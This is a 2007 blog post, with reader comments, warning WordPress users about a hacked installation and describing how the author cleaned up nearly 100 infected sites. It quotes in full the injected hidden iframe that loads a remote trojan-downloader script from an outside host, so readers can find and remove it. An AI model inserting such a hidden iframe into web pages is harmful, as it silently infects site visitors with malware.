Wordpress Version 2.2 Hack Warning
If you use self hosted Wordpress. I strongly recommend that you quickly visit www.wordpress.org and download the most recent version, Version 2.21.
Version 2.2 has a security hole and some hacker from Russia has gone into all of my sites (almost 100) and has installed this line of code:
<IFRAME name=’StatPage’ src=’http://www.555traff.com/trf/traf.php’ width=5 height=5 style=’display:none’></IFRAME>
This code activates a trojan downloader script:
If you have been affected by this. He is my suggested solution to deal with the problem:
- make a back up copy of your current theme, so you don’t lose any design modification work.
- Change your current theme to default.
- Install Wordpress. 2.2.1
- Overwrite all your files using the Wordpress. 2.2.1
- Additional upgrade instructions are provided at www.wordpress.org
- Once you have installed the update, the problem should be fixed.
You are now left with a blog running a clean copy of Wordpress. You are also left with a blog running the default theme. From there go back to your back up copy of your existing current theme and do a search for:
<IFRAME name=’StatPage’ src=’http://www.555traff.com/trf/traf.php’ width=5 height=5 style=’display:none’></IFRAME>
and simply remove that code from any file its found on.
From there you should be able to safely re-upload your existing current theme and activate it.
You are lucky if you don’t have close to 100 blogs like me… I will have to follow these steps 100 times. I guess my To-Do-List for the day has been revised! 
| 3.1 |
14 Comments! Join The Discussion by Leaving Your Comment.
What do you have to say about this post? Leave a comment!
Date/Time: 7-2-2007 11:49:56 Comment #3670
Just a quick suggestion, when having to make wholesale changes, I typically do it this way.
1.) Download all files to local
2.) Search directory with Agent Ransack for text that needs replacing.
3.) Open each file in TextPad and replace the bad code with”" dynamically.
4.) Upload files back to server.
Using Textpad makes the process go much faster than manually editing the file.
IMHO
Date/Time: 7-2-2007 12:21:57 Comment #3671
David,
Thanks for adding to this. I appreciate it.
So, what can you offer a blogger who has to do this with a million blogs affected!
lol…
Retire and get a day job!
Date/Time: 7-2-2007 14:24:43 Comment #3675
Sorry Garry that you have to do this (and everyone else affected)! I hope it will go quickly for you.
Erin
Date/Time: 7-2-2007 14:37:45 Comment #3676
Hey, you still managed to make a funny !!
“Retire and get a day job!”
Just remember their are people like me working a day job and trying to manage 50+ domains after hours ! ( that should cheer you up)
Date/Time: 7-2-2007 15:27:24 Comment #3677
I am going to reserve myself until I get these problems corrected. In the mean time I have this site fixed, however my cpanel section for this site is still infected. I have Blog The Internet corrected and displaying ads that make money… so, at this point, I am updating and just doing a complete overwrite on all my aviation sites without doing back up… saving 50% of my time… at this point, I just need to get this malicious code off these sites as quickly as I can. I will not make money on these site after I overwrite my work becuase my adsense code will be removed… however, to me it is more important to wipe out my work, than to infect other people who can’t get infected without their knowledge.
I will report more about this later… I suggest everyone running Wordpress to update. I think Andy Beard even mentioned this in his comments the other day.. it was slightly off topic but it was there.
Date/Time: 7-2-2007 15:28:54 Comment #3678
This isn’t the easist thing to do when you have a dot Com blog for just about every aircraft ever known to man running!
Date/Time: 7-2-2007 15:47:56 Comment #3679
Oh here is some more humor… I have ran across a few blogs that mention that checking their make money online stats can be addictive… I tend to spend too much time checking my adsense stats too… but a day like today, I have no clue if I have made $1 dollar or $1000 LOL!!!
I do know with the loss of my aviation names, it will be down about 30% of my daily income… so it will be in my best interest to get the adsense code back up as quickly as possible! I won’t have time to use channels… I will install universal channel code and then go back and add channels to my individual sites… Aggghhhh… LOL
Date/Time: 7-5-2007 19:48:20 Comment #3696
Sorry Garry. I hate crap like this.
Date/Time: 7-6-2007 05:26:48 Comment #3702
That is a big, big job. Sorry that happened to you Gary! We beat Russia before (Rocky IV), so I know we can do it again! Eye of the Tiger!
Date/Time: 7-6-2007 10:48:35 Comment #3706
That stinks. I hope you can get it fixed it soon.
Date/Time: 7-7-2007 22:21:34 Comment #3727
testing
Date/Time: 7-22-2007 21:52:04 Comment #3952
Hi, I also had a server attacked by this hacker’s worm that inserts :
… IFRAME name=’StatPage’ src=’http://www.555traff … into your files. It is very aggressive and goes after cPanel files, Horde webmail scripts, clientExec hosting management, phpBB files also. It will infect an entire server in a very short period of time. If this has happed to you and your received errors like:
… Cannot modify header information - headers already sent by (output started at /home ….
You should also notify your hosting provider and ask them to find and replace the intrusive line of code be in the .
My best guess is that the script on the hackers host is loading in the header of your pages and attempting to hijack a session and duplicating itself all over your server attempting to gather user and password info. If it finds a privileged user like root who knows what it can do.
Any ideas on how to pay back this hacker at 555traff dot org ???